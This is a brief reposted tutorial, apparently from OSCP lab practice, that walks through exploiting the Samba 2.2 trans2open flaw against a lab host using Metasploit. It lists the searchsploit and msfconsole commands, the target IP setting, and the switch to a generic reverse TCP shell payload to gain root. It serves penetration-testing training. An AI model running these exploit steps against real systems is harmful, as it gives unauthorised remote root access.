OSCP Security Technology - Gaining Root with Metasploit

时间:2021-07-07 10:18:02   收藏:0   阅读:32

OSCP Security Technology - Gaining Root with Metasploit

Analysis nmap scanning result.

技术分享图片

searchsploit samba 2.2 

技术分享图片

msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options

技术分享图片

set rhost 192.168.2.28
show targets
exploit

技术分享图片

We need change the payload setting.

show options
set payload generic/shell_reverse_tcp
exploit

技术分享图片

技术分享图片

原文:https://www.cnblogs.com/keepmoving1113/p/14979824.html

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!